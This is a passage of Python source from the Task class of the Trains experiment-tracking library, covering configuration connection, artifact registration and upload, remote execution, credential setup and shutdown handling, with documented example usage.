ValueError("Configuration file does not exist")
try:
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
except Exception:
raise ValueError("Could not connect configuration file {}, file could not be read".format(
configuration_path.as_posix()))
self._set_model_config(config_text=configuration_text)
return configuration
else:
configuration_text = self._get_model_config_text()
configuration_path = Path(configuration)
fd, local_filename = mkstemp(prefix='trains_task_config_',
suffix=configuration_path.suffixes[-1] if
configuration_path.suffixes else '.txt')
os.write(fd, configuration_text.encode('utf-8'))
os.close(fd)
return Path(local_filename) if isinstance(configuration, Path) else local_filename
def connect_label_enumeration(self, enumeration):
# type: (Dict[str, int]) -> Dict[str, int]
"""
Connect a label enumeration dictionary to a Task (experiment) object.
Later, when creating an output model, the model will include the label enumeration dictionary.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
:return: The label enumeration dictionary (JSON).
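For example, a minimal sketch (assumes ``task`` is the object returned by :meth:`Task.init`):
.. code-block:: py
labels = task.connect_label_enumeration({'background': 0, 'person': 1})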
"""
if not isinstance(enumeration, dict):
raise ValueError("connect_label_enumeration supports only `dict` type, "
"{} is not supported".format(type(enumeration)))
if not running_remotely() or not self.is_main_task():
self.set_model_label_enumeration(enumeration)
else:
# pop everything
enumeration.clear()
enumeration.update(self.get_labels_enumeration())
return enumeration
def get_logger(self):
# type: () -> Logger
"""
Get a Logger object for reporting, for this task context. You can view all Logger report output associated with
the Task for which this method is called, including metrics, plots, text, tables, and images, in the
**Trains Web-App (UI)**.
:return: The Logger for the Task (experiment).
"""
return self._get_logger()
def mark_started(self):
"""
Manually mark a Task as started (happens automatically)
"""
# UI won't let us see metrics if we're not started
self.started()
self.reload()
def mark_stopped(self):
"""
Manually mark a Task as stopped (also used in :meth:`_at_exit`)
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
# mark task as stopped
self.stopped()
def flush(self, wait_for_uploads=False):
# type: (bool) -> bool
"""
Flush any outstanding reports or console logs.
:param bool wait_for_uploads: Wait for all outstanding uploads to complete before returning from the flush?
- ``True`` - Wait
- ``False`` - Do not wait (default)
"""
# make sure model upload is done
if BackendModel.get_num_results() > 0 and wait_for_uploads:
BackendModel.wait_for_results()
# flush any outstanding logs
if self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
if self._reporter:
self.reporter.flush()
LoggerRoot.flush()
return True
def reset(self, set_started_on_success=False, force=False):
# type: (bool, bool) -> None
"""
Reset a Task. Trains reloads a Task after a successful reset.
When a worker executes a Task remotely, the Task does not reset unless
the ``force`` parameter is set to ``True`` (this avoids accidentally clearing logs and metrics).
:param bool set_started_on_success: If successful, automatically set the Task to started?
- ``True`` - If successful, set to started.
- ``False`` - If successful, do not set to started. (default)
:param bool force: Force a Task reset, even when executing the Task (experiment) remotely in a worker?
- ``True`` - Force
- ``False`` - Do not force (default)
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success)
def close(self):
"""
Close the current Task. Enables you to manually shutdown the task.
.. warning::
Only call :meth:`Task.close` if you are certain the Task is not needed.
"""
if self._at_exit_called:
return
# store is_main before we call at_exit, because at_exit will set it to None
is_main = self.is_main_task()
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
self.__shutdown()
# unregister atexit callbacks and signal hooks, if we are the main task
if is_main:
self.__register_at_exit(None)
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, pandas.DataFrame, Dict, Union[bool, Sequence[str]]) -> None
"""
Register (add) an artifact for the current Task. Registered artifacts are dynamically synchronized with the
**Trains Server** (backend). If a registered artifact is updated, the update is stored in the
**Trains Server** (backend). Registered artifacts are primarily used for Data Audition.
The currently supported registered artifact object type is a pandas.DataFrame.
See also :meth:`Task.unregister_artifact` and :meth:`Task.get_registered_artifacts`.
.. note::
Trains also supports uploaded artifacts which are one-time uploads of static artifacts that are not
dynamically synchronized with the **Trains Server** (backend). These static artifacts include
additional object types. For more information, see :meth:`Task.upload_artifact`.
:param str name: The name of the artifact.
.. warning::
If an artifact with the same name was previously registered, it is overwritten.
:param object artifact: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **Trains Web-App (UI)**, **ARTIFACTS** tab.
:param uniqueness_columns: A Sequence of columns for artifact uniqueness comparison criteria, or the default
value of ``True``. If ``True``, the artifact uniqueness comparison criteria is all the columns,
which is the same as ``artifact.columns``.
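For example, a minimal sketch registering a pandas DataFrame (assumes ``task`` is the object
returned by :meth:`Task.init`; the column names are placeholders):
.. code-block:: py
import pandas as pd
df = pd.DataFrame({'id': [1, 2, 3], 'label': ['cat', 'dog', 'bird']})
# changes to df are synchronized with the server; uniqueness is checked on the 'id' column
task.register_artifact(name='train samples', artifact=df, uniqueness_columns=['id'])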
"""
if not isinstance(uniqueness_columns, CollectionsSequence) and uniqueness_columns is not True:
raise ValueError('uniqueness_columns should be a List (sequence) or True')
if isinstance(uniqueness_columns, str):
uniqueness_columns = [uniqueness_columns]
self._artifacts_manager.register_artifact(
name=name, artifact=artifact, metadata=metadata, uniqueness_columns=uniqueness_columns)
def unregister_artifact(self, name):
# type: (str) -> None
"""
Unregister (remove) a registered artifact. This removes the artifact from the watch list that Trains uses
to synchronize artifacts with the **Trains Server** (backend).
.. important::
- Calling this method does not remove the artifact from a Task. It only stops Trains from
monitoring the artifact.
- When this method is called, Trains immediately takes the last snapshot of the artifact.
"""
self._artifacts_manager.unregister_artifact(name=name)
def get_registered_artifacts(self):
# type: () -> Dict[str, Artifact]
"""
Get a dictionary containing the Task's registered (dynamically synchronized) artifacts (name, artifact object).
.. note::
After calling ``get_registered_artifacts``, you can still modify the registered artifacts.
:return: The registered (dynamically synchronized) artifacts.
"""
return self._artifacts_manager.registered_artifacts
def upload_artifact(
self,
name, # type: str
artifact_object, # type: Union[str, Mapping, pandas.DataFrame, numpy.ndarray, Image.Image]
metadata=None, # type: Optional[Mapping]
delete_after_upload=False # type: bool
):
# type: (...) -> bool
"""
Upload (add) a static artifact to a Task object. The artifact is uploaded in the background.
The currently supported upload (static) artifact types include:
- string / pathlib2.Path - A path to an artifact file. If a wildcard or a folder is specified, then Trains
creates and uploads a ZIP file.
- dict - Trains stores a dictionary as ``.json`` file and uploads it.
- pandas.DataFrame - Trains stores a pandas.DataFrame as ``.csv.gz`` (compressed CSV) file and uploads it.
- numpy.ndarray - Trains stores a numpy.ndarray as ``.npz`` file and uploads it.
- PIL.Image - Trains stores a PIL.Image as ``.png`` file and uploads it.
:param str name: The artifact name.
.. warning::
If an artifact with the same name was previously uploaded, then it is overwritten.
:param object artifact_object: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **Trains Web-App (UI)**, **ARTIFACTS** tab.
:param bool delete_after_upload: After the upload, delete the local copy of the artifact?
- ``True`` - Delete the local copy of the artifact.
- ``False`` - Do not delete. (default)
:return: The status of the upload.
- ``True`` - Upload succeeded.
- ``False`` - Upload failed.
:raise: If the artifact object type is not supported, raise a ``ValueError``.
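For example, a minimal sketch (assumes ``task`` is the object returned by :meth:`Task.init`;
the artifact name and dictionary content are placeholders):
.. code-block:: py
# a dict artifact is stored as a .json file and uploaded in the background
task.upload_artifact(name='run configuration', artifact_object={'lr': 0.01, 'epochs': 10})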
"""
return self._artifacts_manager.upload_artifact(name=name, artifact_object=artifact_object,
metadata=metadata, delete_after_upload=delete_after_upload)
def get_models(self):
# type: () -> Dict[str, Sequence[Model]]
"""
Return a dictionary with {'input': [], 'output': []} loaded/stored models of the current Task
Input models are files loaded in the task, either manually or automatically logged
Output models are files stored in the task, either manually or automatically logged
Automatically logged frameworks are for example: TensorFlow, Keras, PyTorch, ScikitLearn(joblib) etc.
:return: A dictionary with keys input/output, each is list of Model objects.
Example:
.. code-block:: py
{'input': [trains.Model()], 'output': [trains.Model()]}
"""
task_models = {'input': self._get_models(model_type='input'),
'output': self._get_models(model_type='output')}
return task_models
def is_current_task(self):
# type: () -> bool
"""
.. deprecated:: 0.13.0
This method is deprecated. Use :meth:`Task.is_main_task` instead.
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)?
:return: Is this Task object the main execution Task?
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self.is_main_task()
def is_main_task(self):
# type: () -> bool
"""
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)?
.. note::
If :meth:`Task.init` was never called, this method will *not* create
it, making this test more efficient than:
.. code-block:: py
Task.init() == task
:return: Is this Task object the main execution Task?
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
self._set_model_config(config_text=config_text, config_dict=config_dict)
def get_model_config_text(self):
# type: () -> str
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_text()
def get_model_config_dict(self):
# type: () -> Dict
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_dict()
def set_model_label_enumeration(self, enumeration=None):
# type: (Optional[Mapping[str, int]]) -> ()
"""
Set the label enumeration for the Task object before creating an output model.
Later, when creating an output model, the model will inherit these properties.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
# type: () -> int
"""
Get the last reported iteration, which is the last iteration for which the Task reported a metric.
.. note::
The maximum reported iteration is not in the local cache. This method
sends a request to the **Trains Server** (backend).
:return: The last reported iteration number.
"""
self._reload_last_iteration()
return max(self.data.last_iteration, self._reporter.max_iteration if self._reporter else 0)
def set_last_iteration(self, last_iteration):
# type: (int) -> None
"""
Forcefully set the last reported iteration, which is the last iteration for which the Task reported a metric.
:param int last_iteration: The last reported iteration number.
"""
self.data.last_iteration = int(last_iteration)
self._edit(last_iteration=self.data.last_iteration)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set initial iteration, instead of zero. Useful when continuing training from previous checkpoints
:param int offset: Initial iteration (at starting point)
:return: Newly set initial offset.
"""
return super(Task, self).set_initial_iteration(offset=offset)
def get_initial_iteration(self):
# type: () -> int
"""
Return the initial iteration offset, default is 0
Useful when continuing training from previous checkpoints
:return: Initial iteration offset.
"""
return super(Task, self).get_initial_iteration()
def get_last_scalar_metrics(self):
# type: () -> Dict[str, Dict[str, Dict[str, float]]]
"""
Get the last scalar metrics which the Task reported. This is a nested dictionary, ordered by title and series.
For example:
.. code-block:: javascript
{
'title': {
'series': {
'last': 0.5,
'min': 0.1,
'max': 0.9
}
}
}
:return: The last scalar metrics.
"""
self.reload()
metrics = self.data.last_metrics
scalar_metrics = dict()
for i in metrics.values():
for j in i.values():
scalar_metrics.setdefault(j['metric'], {}).setdefault(
j['variant'], {'last': j['value'], 'min': j['min_value'], 'max': j['max_value']})
return scalar_metrics
def get_parameters_as_dict(self):
# type: () -> Dict
"""
Get the Task parameters as a raw nested dictionary.
.. note::
The values are not parsed. They are returned as is.
"""
return naive_nested_from_flat_dictionary(self.get_parameters())
def set_parameters_as_dict(self, dictionary):
# type: (Dict) -> None
"""
Set the parameters for the Task object from a dictionary. The dictionary can be nested.
This does not link the dictionary to the Task object; it does a one-time update,
unlike the :meth:`Task.connect` method, which keeps the connected object synchronized with the Task.
"""
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
def execute_remotely(self, queue_name=None, clone=False, exit_process=True):
# type: (Optional[str], bool, bool) -> ()
"""
If task is running locally (i.e., not by ``trains-agent``), then clone the Task and enqueue it for remote
execution; or, stop the execution of the current Task, reset its state, and enqueue it. If ``exit_process=True``,
*exit* this process.
.. note::
If the task is running remotely (i.e., ``trains-agent`` is executing it), this call is a no-op
(i.e., does nothing).
:param queue_name: The queue name used for enqueueing the task. If ``None``, this call exits the process
without enqueuing the task.
:param clone: Clone the Task and execute the newly cloned Task?
The values are:
- ``True`` - A cloned copy of the Task will be created, and enqueued, instead of this Task.
- ``False`` - The Task will be enqueued.
:param exit_process: The function call will leave the calling process at the end?
- ``True`` - Exit the process (exit(0)).
- ``False`` - Do not exit the process.
.. warning::
If ``clone==False``, then ``exit_process`` must be ``True``.
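For example, a minimal sketch (the project, task and queue names below are placeholders and assume
a queue named "default" is being served by a trains-agent):
.. code-block:: py
from trains import Task
task = Task.init(project_name='examples', task_name='remote run')
# everything below this call only runs on the remote worker
task.execute_remotely(queue_name='default')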
"""
# do nothing, we are running remotely
if running_remotely():
return
if not clone and not exit_process:
raise ValueError(
"clone==False and exit_process==False is not supported. "
"Task enqueuing itself must exit the process afterwards.")
# make sure we analyze the process
if self.status in (Task.TaskStatusEnum.in_progress, ):
if clone:
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
self.flush(wait_for_uploads=True)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
else:
# close ourselves (it will make sure the repo is updated)
self.close()
# clone / reset Task
if clone:
task = Task.clone(self)
else:
task = self
self.reset()
# enqueue ourselves
if queue_name:
Task.enqueue(task, queue_name=queue_name)
LoggerRoot.get_base_logger().warning(
'Switching to remote execution, output log page {}'.format(task.get_output_log_web_page()))
# leave this process.
if exit_process:
LoggerRoot.get_base_logger().warning('Terminating local execution process')
exit(0)
return
def wait_for_status(
self,
status=(_Task.TaskStatusEnum.completed, _Task.TaskStatusEnum.stopped, _Task.TaskStatusEnum.closed),
raise_on_status=(tasks.TaskStatusEnum.failed,),
check_interval_sec=60.,
):
# type: (Iterable[Task.TaskStatusEnum], Optional[Iterable[Task.TaskStatusEnum]], float) -> ()
"""
Wait for a task to reach a defined status.
:param status: Status to wait for. Defaults to ('completed', 'stopped', 'closed', )
:param raise_on_status: Raise a RuntimeError if the status of the Task matches one of these values.
Defaults to ('failed', ).
:param check_interval_sec: Interval in seconds between two checks. Defaults to 60 seconds.
:raise: RuntimeError if the status is one of {raise_on_status}.
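For example, a minimal sketch (assumes ``task`` is an enqueued Task object, e.g. returned
by :meth:`Task.get_task`):
.. code-block:: py
# block until the task completes or stops; raises RuntimeError if it fails (default)
task.wait_for_status(check_interval_sec=30.)
print('task finished with status: {}'.format(task.status))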
"""
stopped_status = list(status) + (list(raise_on_status) if raise_on_status else [])
while self.status not in stopped_status:
time.sleep(check_interval_sec)
if raise_on_status and self.status in raise_on_status:
raise RuntimeError("Task {} has status: {}.".format(self.task_id, self.status))
@classmethod
def set_credentials(cls, api_host=None, web_host=None, files_host=None, key=None, secret=None, host=None):
# type: (Optional[str], Optional[str], Optional[str], Optional[str], Optional[str], Optional[str]) -> ()
"""
Set new default **Trains Server** (backend) host and credentials.
These credentials will be overridden by either OS environment variables, or the Trains configuration
file, ``trains.conf``.
.. warning::
Credentials must be set before initializing a Task object.
For example, to set credentials for a remote computer:
.. code-block:: py
Task.set_credentials(api_host='http://localhost:8008', web_host='http://localhost:8080',
files_host='http://localhost:8081', key='optional_credentials', secret='optional_credentials')
task = Task.init('project name', 'experiment name')
:param str api_host: The API server url. For example, ``host='http://localhost:8008'``
:param str web_host: The Web server url. For example, ``host='http://localhost:8080'``
:param str files_host: The file server url. For example, ``host='http://localhost:8081'``
:param str key: The user key (in the key/secret pair). For example, ``key='thisisakey123'``
:param str secret: The user secret (in the key/secret pair). For example, ``secret='thisisseceret123'``
:param str host: The host URL (overrides api_host). For example, ``host='http://localhost:8008'``
"""
if api_host:
Session.default_host = api_host
if web_host:
Session.default_web = web_host
if files_host:
Session.default_files = files_host
if key:
Session.default_key = key
if not running_remotely():
ENV_ACCESS_KEY.set(key)
if secret:
Session.default_secret = secret
if not running_remotely():
ENV_SECRET_KEY.set(secret)
if host:
Session.default_host = host
Session.default_web = web_host or ''
Session.default_files = files_host or ''
def _set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
Set Task model configuration text/dict
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# noinspection PyProtectedMember
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def _get_model_config_text(self):
# type: () -> str
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return: The model config_text (unconstrained text string).
"""
return super(Task, self).get_model_design()
def _get_model_config_dict(self):
# type: () -> Dict
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return: config_dict: model configuration parameters dictionary.
"""
config_text = self._get_model_config_text()
# noinspection PyProtectedMember
return OutputModel._text_to_config_dict(config_text)
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
@classmethod
def _create_dev_task(
cls, default_project_name, default_task_name, default_task_type, reuse_last_task_id, detect_repo=True
):
if not default_project_name or not default_task_name:
# get project name and task name from repository name and entry_point
result, _ = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
if not default_project_name:
# noinspection PyBroadException
try:
parts = result.script['repository'].split('/')
default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
except Exception:
default_project_name = 'Untitled'
if not default_task_name:
# noinspection PyBroadException
try:
default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
except Exception:
pass
# if we force no task reuse from os environment
if DEV_TASK_NO_REUSE.get() or not reuse_last_task_id:
default_task = None
else:
# if we have a previous session to use, get the task id from it
default_task = cls.__get_last_used_task_id(
default_project_name,
default_task_name,
default_task_type.value,
)
closed_old_task = False
default_task_id = None
task = None
in_dev_mode = not running_remotely()
if in_dev_mode:
if isinstance(reuse_last_task_id, str) and reuse_last_task_id:
default_task_id = reuse_last_task_id
elif not reuse_last_task_id or not cls.__task_is_relevant(default_task):
default_task_id = None
else:
default_task_id = default_task.get('id') if default_task else None
if default_task_id:
try:
task = cls(
private=cls.__create_protection,
task_id=default_task_id,
log_to_backend=True,
)
task_tags = task.data.system_tags if hasattr(task.data, 'system_tags') else task.data.tags
task_artifacts = task.data.execution.artifacts \
if hasattr(task.data.execution, 'artifacts') else None
if ((str(task._status) in (str(tasks.TaskStatusEnum.published), str(tasks.TaskStatusEnum.closed)))
or task.output_model_id or (ARCHIVED_TAG in task_tags)
or (cls._development_tag not in task_tags)
or task_artifacts):
# If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
# If the task is archived, or already has an output model,
# we shouldn't use it in development mode either
default_task_id = None
task = None
else:
with task._edit_lock:
# from now on, there is no need to reload, we just clear stuff,
# this flag will be cleared off once we actually refresh at the end of the function
task._reload_skip_flag = True
# reset the task, so we can update it
task.reset(set_started_on_success=False, force=False)
# clear the heaviest stuff first
task._clear_task(
system_tags=[cls._development_tag],
comment=make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
except (Exception, ValueError):
# we failed reusing task, create a new one
default_task_id = None
# create a new task
if not default_task_id:
task = cls(
private=cls.__create_protection,
project_name=default_project_name,
task_name=default_task_name,
task_type=default_task_type,
log_to_backend=True,
)
# no need to reload yet, we clear this before the end of the function
task._reload_skip_flag = True
if in_dev_mode:
# update this session, for later use
cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
# set default docker image from env.
task._set_default_docker_image()
# mark the task as started
task.started()
# reload, making sure we are synced
task._reload_skip_flag = False
task.reload()
# force update of base logger to this current task (this is the main logger task)
task._setup_log(replace_existing=True)
logger = task.get_logger()
if closed_old_task:
logger.report_text('TRAINS Task: Closing old development task id={}'.format(default_task.get('id')))
# print warning, reusing/creating a task
if default_task_id:
logger.report_text('TRAINS Task: overwriting (reusing) task id=%s' % task.id)
else:
logger.report_text('TRAINS Task: created new task id=%s' % task.id)
# update current repository and put warning into logs
if detect_repo:
# noinspection PyBroadException
try:
import traceback
stack = traceback.extract_stack(limit=10)
# NOTICE WE ARE ALWAYS 3 down from caller in stack!
for i in range(len(stack)-1, 0, -1):
# look for the Task.init call, then the one above it is the callee module
if stack[i].name == 'init':
task._calling_filename = os.path.abspath(stack[i-1].filename)
break
except Exception:
pass
if in_dev_mode and cls.__detect_repo_async:
task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
task._detect_repo_async_thread.daemon = True
task._detect_repo_async_thread.start()
else:
task._update_repository()
# make sure we see something in the UI
thread = threading.Thread(target=LoggerRoot.flush)
thread.daemon = True
thread.start()
return task
def _get_logger(self, flush_period=NotSet):
# type: (Optional[float]) -> Logger
"""
get a logger object for reporting based on the task
:param flush_period: The period of the logger flush.
If None or any other False value, the logger will not flush periodically.
If a logger was created before, this will be the new period and
the old one will be discarded.
:return: Logger object
"""
if not self._logger:
# do not recreate logger after task was closed/quit
if self._at_exit_called:
raise ValueError("Cannot use Task Logger after task was closed")
# force update of base logger to this current task (this is the main logger task)
self._setup_log(replace_existing=self.is_main_task())
# Get a logger object
self._logger = Logger(private_task=self)
# make sure we set our reported to async mode
# we make sure we flush it in self._at_exit
self.reporter.async_enable = True
# if we just created the logger, set default flush period
if not flush_period or flush_period is self.NotSet:
flush_period = DevWorker.report_period
if isinstance(flush_period, (int, float)):
flush_period = int(abs(flush_period))
if flush_period is None or isinstance(flush_period, int):
self._logger.set_flush_period(flush_period)
return self._logger
def _connect_output_model(self, model):
assert isinstance(model, OutputModel)
model.connect(self)
return model
def _save_output_model(self, model):
"""
Save a reference to the connected output model.
:param model: The connected output model
"""
self._connected_output_model = model
def _reconnect_output_model(self):
"""
If there is a saved connected output model, connect it again.
This is needed if the input model is connected after the output model
is connected, and then we will have to get the model design from the
input model by reconnecting.
"""
if self._connected_output_model:
self.connect(self._connected_output_model)
def _connect_input_model(self, model):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
if self._last_input_model_id and self._last_input_model_id != model.id:
self.log.info('Task connect, second input model is not supported, adding into comment section')
return
self._last_input_model_id = model.id
model.connect(self)
return model
def _try_set_connected_parameter_type(self, option):
# """ Raise an error if current value is not None and not equal to the provided option value """
# value = self._connected_parameter_type
# if not value or value == option:
# self._connected_parameter_type = option
# return option
#
# def title(option):
# return " ".join(map(str.capitalize, option.split("_")))
#
# raise ValueError(
# "Task already connected to {}. "
# "Task can be connected to only one the following argument options: {}".format(
# title(value),
# ' / '.join(map(title, self._ConnectedParametersType._options())))
# )
# added support for multiple type connections through _Arguments
return option
def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None):
# do not allow argparser to connect to jupyter notebook
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
ip = get_ipython()
if ip is not None and 'IPKernelApp' in ip.config:
return parser
except Exception:
pass
self._try_set_connected_parameter_type(self._ConnectedParametersType.argparse)
if self.is_main_task():
argparser_update_currenttask(self)
if (parser is None or parsed_args is None) and argparser_parseargs_called():
_parser, _parsed_args = get_argparser_last_args()
if parser is None:
parser = _parser
if parsed_args is None and parser == _parser:
parsed_args = _parsed_args
if running_remotely() and self.is_main_task():
self._arguments.copy_to_parser(parser, parsed_args)
else:
self._arguments.copy_defaults_from_argparse(
parser, args=args, namespace=namespace, parsed_args=parsed_args)
return parser
def _connect_dictionary(self, dictionary):
def _update_args_dict(task, config_dict):
# noinspection PyProtectedMember
task._arguments.copy_from_dict(flatten_dictionary(config_dict))
def _refresh_args_dict(task, config_dict):
# reread from task including newly added keys
# noinspection PyProtectedMember
a_flat_dict = task._arguments.copy_to_dict(flatten_dictionary(config_dict))
# noinspection PyProtectedMember
nested_dict = config_dict._to_dict()
config_dict.clear()
config_dict.update(nested_from_flat_dictionary(nested_dict, a_flat_dict))
self._try_set_connected_parameter_type(self._ConnectedParametersType.dictionary)
if not running_remotely() or not self.is_main_task():
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
dictionary = ProxyDictPostWrite(self, _update_args_dict, **dictionary)
else:
flat_dict = flatten_dictionary(dictionary)
flat_dict = self._arguments.copy_to_dict(flat_dict)
dictionary = nested_from_flat_dictionary(dictionary, flat_dict)
dictionary = ProxyDictPostWrite(self, _refresh_args_dict, **dictionary)
return dictionary
def _connect_task_parameters(self, attr_class):
self._try_set_connected_parameter_type(self._ConnectedParametersType.task_parameters)
if running_remotely() and self.is_main_task():
attr_class.update_from_dict(self.get_parameters())
else:
self.set_parameters(attr_class.to_dict())
return attr_class
def _validate(self, check_output_dest_credentials=False):
if running_remotely():
super(Task, self)._validate(check_output_dest_credentials=False)
def _output_model_updated(self):
""" Called when a connected output model is updated """
if running_remotely() or not self.is_main_task():
return
# Make sure we know we've started, just in case we didn't so far
self._dev_mode_task_start(model_updated=True)
def _dev_mode_task_start(self, model_updated=False):
""" Called when we suspect the task has started running """
self._dev_mode_setup_worker(model_updated=model_updated)
def _dev_mode_stop_task(self, stop_reason):
# make sure we do not get called (by a daemon thread) after at_exit
if self._at_exit_called:
return
self.log.warning(
"### TASK STOPPED - USER ABORTED - {} ###".format(
stop_reason.upper().replace('_', ' ')
)
)
self.flush(wait_for_uploads=True)
self.stopped()
if self._dev_worker:
self._dev_worker.unregister()
# NOTICE! This will end the entire execution tree!
if self.__exit_hook:
self.__exit_hook.remote_user_aborted = True
self._kill_all_child_processes(send_kill=False)
time.sleep(2.0)
self._kill_all_child_processes(send_kill=True)
# noinspection PyProtectedMember
os._exit(1)
@staticmethod
def _kill_all_child_processes(send_kill=False):
# get current process if pid not provided
pid = os.getpid()
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
if send_kill:
child.kill()
else:
child.terminate()
# kill ourselves
if send_kill:
parent.kill()
else:
parent.terminate()
def _dev_mode_setup_worker(self, model_updated=False):
if running_remotely() or not self.is_main_task() or self._at_exit_called:
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
def _wait_for_repo_detection(self, timeout=None):
# wait for detection repo sync
if not self._detect_repo_async_thread:
return
with self._repo_detect_lock:
if not self._detect_repo_async_thread:
return
# noinspection PyBroadException
try:
if self._detect_repo_async_thread.is_alive():
# if negative timeout, just kill the thread:
if timeout is not None and timeout < 0:
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Waiting for repository detection and full package requirement analysis')
self._detect_repo_async_thread.join(timeout=timeout)
# because join has no return value
if self._detect_repo_async_thread.is_alive():
self.log.info('Repository and package analysis timed out ({} sec), '
'giving up'.format(timeout))
# done waiting, kill the thread
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Finished repository detection and package analysis')
self._detect_repo_async_thread = None
except Exception:
pass
def _summary_artifacts(self):
# signal artifacts upload, and stop daemon
self._artifacts_manager.stop(wait=True)
# print artifacts summary (if not empty)
if self._artifacts_manager.summary:
self.get_logger().report_text(self._artifacts_manager.summary)
def _at_exit(self):
# protect sub-process at_exit (should never happen)
if self._at_exit_called:
return
# shutdown will clear the main, so we have to store it before.
# is_main = self.is_main_task()
self.__shutdown()
# In rare cases we might need to forcefully shutdown the process, currently we should avoid it.
# if is_main:
# # we have to forcefully shutdown if we have forked processes, sometimes they will get stuck
# os._exit(self.__exit_hook.exit_code if self.__exit_hook and self.__exit_hook.exit_code else 0)
def __shutdown(self):
"""
Called automatically once the code exits, i.e. via atexit.
"""
# protect sub-process at_exit
if self._at_exit_called:
return
is_sub_process = self.__is_subprocess()
# noinspection PyBroadException
try:
# from here do not get into watch dog
self._at_exit_called = True
wait_for_uploads = True
# first thing mark task as stopped, so we will not end up with "running" on lost tasks
# if we are running remotely, the daemon will take care of it
task_status = None
wait_for_std_log = True
if not running_remotely() and self.is_main_task() and not is_sub_process:
# check if we crashed, or the signal is not an interrupt (manual break)
task_status = ('stopped', )
if self.__exit_hook:
is_exception = self.__exit_hook.exception
# check if we are running inside a debugger
if not is_exception and sys.modules.get('pydevd'):
# noinspection PyBroadException
try:
is_exception = sys.last_type
except Exception:
pass
if (is_exception and not isinstance(self.__exit_hook.exception, KeyboardInterrupt)) \
or (not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal not in (None, 2)):
task_status = ('failed', 'Exception')
wait_for_uploads = False
else:
wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None and \
not is_exception:
task_status = ('completed', )
else:
task_status = ('stopped', )
# user aborted. do not bother flushing the stdout logs
wait_for_std_log = self.__exit_hook.signal is not None
# wait for repository detection (if we didn't crash)
if wait_for_uploads and self._logger:
# we should print summary here
self._summary_artifacts()
# make sure that if we crashed the thread we are not waiting forever
if not is_sub_process:
self._wait_for_repo_detection(timeout=10.)
# kill the repo thread (negative timeout, do not wait), if it hasn't finished yet.
self._wait_for_repo_detection(timeout=-1)
# wait for uploads
print_done_waiting = False
if wait_for_uploads and (BackendModel.get_num_results() > 0 or
(self._reporter and self.reporter.get_num_results() > 0)):
self.log.info('Waiting to finish uploads')
print_done_waiting = True
# from here, do not send log in background thread
if wait_for_uploads:
